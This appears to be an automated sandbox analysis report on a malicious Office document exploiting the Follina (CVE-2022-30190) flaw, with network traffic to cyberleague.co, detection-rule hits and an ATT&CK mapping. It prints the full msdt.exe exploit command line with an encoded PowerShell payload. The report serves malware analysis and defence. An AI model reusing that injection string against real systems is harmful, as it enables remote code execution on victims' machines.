  • https://metadata.templates.cdn.office.net/client/log
  • https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  • https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://ncus.contentsync.
  • https://ncus.pagecontentsync.
  • https://o365auditrealtimeingestion.manage.office.com
  • https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
  • https://o365diagnosticsppe-web.cloudapp.net
  • https://ocos-office365-s2s.msedge.net/ab
  • https://ofcrecsvcapi-int.azurewebsites.net/
  • https://officeapps.live.com
  • https://officeci.azurewebsites.net/api/
  • https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
  • https://officesetup.getmicrosoftkey.com
  • https://ogma.osi.office.net/TradukoApi/api/v1.0/
  • https://omex.cdn.office.net/addinclassifier/officeentities
  • https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
  • https://omex.cdn.office.net/addinclassifier/officesharedentities
  • https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
  • https://onedrive.live.com
  • https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
  • https://onedrive.live.com/embed?
  • https://osi.office.net
  • https://otelrules.azureedge.net
  • https://outlook.office.com
  • https://outlook.office.com/
  • https://outlook.office.com/autosuggest/api/v1/init?cvid=
  • https://outlook.office365.com
  • https://outlook.office365.com/
  • https://outlook.office365.com/api/v1.0/me/Activities
  • https://outlook.office365.com/autodiscover/autodiscover.json
  • https://ovisualuiapp.azurewebsites.net/pbiagave/
  • https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://roaming.edog.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://settings.outlook.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://tasks.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknown | DNS traffic detected: queries for: cyberleague.co
        Source: global traffic | HTTP traffic detected:
            GET /th1s.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
            Host: cyberleague.co
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /th1s.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
            Host: cyberleague.co
            If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
            If-None-Match: "13e4-5e063d0e1ca1e"
            Connection: Keep-Alive
        Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        System Summary

        barindex
        Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
        Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieślak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
        Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 7100, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: 20220531_180800.rtf.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\20220531_180800.rtf
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{76F41A02-472B-4714-A15B-4E9746E42478} - OProcSessId.dat
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
        Source: classification engine | Classification label: mal72.expl.evad.winRTF@5/15@2/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
        Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

        Data Obfuscation

        barindex
        Source: 20220531_180800.rtf | Initial file: Document starts with PK

        Persistence and Installation Behavior

        barindex
        Source: document.xml.rels | Extracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Process information set: NOOPENFILEERRORBOX (identical entry repeated 10 times in the report)
        Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 4 times in the report)
        Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 1187
        Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 1129
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created (identical entry reported twice): C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation (identical entry reported twice)
        MITRE ATT&CK matrix, listed per tactic column. The number in parentheses is the hit count the report shows next to that technique; techniques without a number had no matching signature.

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
        Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (23); At (Linux); At (Windows); Cron
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
        Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script
        Defense Evasion: Masquerading (11); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
        Discovery: Query Registry (1); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
        Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
        Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
        Impact: Modify System Partition; Device Lockout; Delete Device Data
        No Antivirus matches
        Source | Detection | Scanner | Label (the Link column is empty for every row)
        https://roaming.edog. | 0% | URL Reputation | safe
        https://cdn.entity. | 0% | URL Reputation | safe
        https://powerlift.acompli.net | 0% | URL Reputation | safe
        https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
        https://cortana.ai | 0% | URL Reputation | safe
        https://api.aadrm.com/ | 0% | URL Reputation | safe
        https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
        https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
        https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
        https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
        https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
        https://api.aadrm.com | 0% | URL Reputation | safe
        https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
        https://www.odwebp.svc.ms | 0% | URL Reputation | safe
        https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
        https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
        https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
        https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
        https://ncus.contentsync. | 0% | URL Reputation | safe
        https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
        https://wus2.contentsync. | 0% | URL Reputation | safe
        https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
        https://ncus.pagecontentsync. | 0% | URL Reputation | safe
        https://cyberleague.co/th1s.html | 0% | Avira URL Cloud | safe
        https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        cyberleague.co | 13.250.15.191 | true | true | (none) | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://cyberleague.co/th1s.html | true | Avira URL Cloud: safe | unknown
        Name | Antivirus Detection | Reputation (for every row below, Source is the dropped file 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.dr and Malicious is false)
        https://api.diagnosticssdf.office.com | (none) | high
        https://login.microsoftonline.com/ | (none) | high
        https://shell.suite.office.com:1443 | (none) | high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | (none) | high
        https://autodiscover-s.outlook.com/ | (none) | high
        https://roaming.edog. | URL Reputation: safe | unknown
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | (none) | high
        https://cdn.entity. | URL Reputation: safe | unknown
        https://api.addins.omex.office.net/appinfo/query | (none) | high
        https://clients.config.office.net/user/v1.0/tenantassociationkey | (none) | high
        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | (none) | high
        https://powerlift.acompli.net | URL Reputation: safe | unknown
        https://rpsticket.partnerservices.getmicrosoftkey.com | URL Reputation: safe | unknown
        https://lookup.onenote.com/lookup/geolocation/v1 | (none) | high
        https://cortana.ai | URL Reputation: safe | unknown
        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | (none) | high
        https://cloudfiles.onenote.com/upload.aspx | (none) | high
        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | (none) | high
        https://entitlement.diagnosticssdf.office.com | (none) | high
        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | (none) | high
        https://api.aadrm.com/ | URL Reputation: safe | unknown
        https://ofcrecsvcapi-int.azurewebsites.net/ | URL Reputation: safe | unknown
        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | (none) | high
        https://api.microsoftstream.com/api/ | (none) | high
        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | (none) | high
        https://cr.office.com | (none) | high
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | Avira URL Cloud: safe | low
        https://portal.office.com/account/?ref=ClientMeControl | (none) | high
        https://graph.ppe.windows.net | (none) | high
        https://res.getmicrosoftkey.com/api/redemptionevents | URL Reputation: safe | unknown
        https://powerlift-frontdesk.acompli.net | URL Reputation: safe | unknown
        https://tasks.office.com | (none) | high
        https://officeci.azurewebsites.net/api/ | URL Reputation: safe | unknown
        https://sr.outlook.office.net/ws/speech/recognize/assistant/work | (none) | high
        https://store.office.cn/addinstemplate | URL Reputation: safe | unknown
        https://api.aadrm.com | URL Reputation: safe | unknown
        https://outlook.office.com/autosuggest/api/v1/init?cvid= | (none) | high
        https://globaldisco.crm.dynamics.com | (none) | high
        https://messaging.engagement.office.com/ | (none) | high
        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | (none) | high
        https://dev0-api.acompli.net/autodetect | URL Reputation: safe | unknown
        https://www.odwebp.svc.ms | URL Reputation: safe | unknown
        https://api.diagnosticssdf.office.com/v2/feedback | (none) | high
        https://api.powerbi.com/v1.0/myorg/groups | (none) | high
        https://web.microsoftstream.com/video/ | (none) | high
        https://api.addins.store.officeppe.com/addinstemplate | URL Reputation: safe | unknown
        https://graph.windows.net | (none) | high
        https://dataservice.o365filtering.com/ | URL Reputation: safe | unknown
        https://officesetup.getmicrosoftkey.com | URL Reputation: safe | unknown
        https://analysis.windows.net/powerbi/api | (none) | high
        https://prod-global-autodetect.acompli.net/autodetect | URL Reputation: safe | unknown
        https://outlook.office365.com/autodiscover/autodiscover.json | (none) | high
        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | (none) | high
        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | (none) | high
        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | (none) | high
        https://ncus.contentsync. | URL Reputation: safe | unknown
        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | (none) | high
        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | (none) | high
        http://weather.service.msn.com/data.aspx | (none) | high
        https://apis.live.net/v5.0/ | URL Reputation: safe | unknown
        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | (none) | high
        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | (none) | high
        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | (none) | high
        https://management.azure.com | (none) | high
        https://outlook.office365.com | (none) | high
        https://wus2.contentsync. | URL Reputation: safe | unknown
        https://incidents.diagnostics.office.com | (none) | high
        https://clients.config.office.net/user/v1.0/ios | (none) | high
        https://insertmedia.bing.office.net/odc/insertmedia | (none) | high
        https://o365auditrealtimeingestion.manage.office.com | (none) | high
        https://outlook.office365.com/api/v1.0/me/Activities | (none) | high
        https://api.office.net | (none) | high
        https://incidents.diagnosticssdf.office.com | (none) | high
        https://asgsmsproxyapi.azurewebsites.net/ | URL Reputation: safe | unknown
        https://clients.config.office.net/user/v1.0/android/policies | (none) | high
        https://entitlement.diagnostics.office.com | (none) | high
        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | (none) | high
        https://substrate.office.com/search/api/v2/init | (none) | high
        https://outlook.office.com/ | (none) | high
        https://storage.live.com/clientlogs/uploadlocation | (none) | high
        https://outlook.office365.com/ | (none) | high
        https://webshell.suite.office.com | (none) | high
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | (none) | high
        https://substrate.office.com/search/api/v1/SearchHistory | (none) | high
        https://management.azure.com/ | (none) | high
        https://clients.config.office.net/c2r/v1.0/InteractiveInstallation | (none) | high
        https://login.windows.net/common/oauth2/authorize | (none) | high
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | URL Reputation: safe | unknown
        https://graph.windows.net/ | (none) |
                                                                                                                                            high
                                                                                                                                            https://api.powerbi.com/beta/myorg/imports4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://devnull.onenote.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ncus.pagecontentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                      high
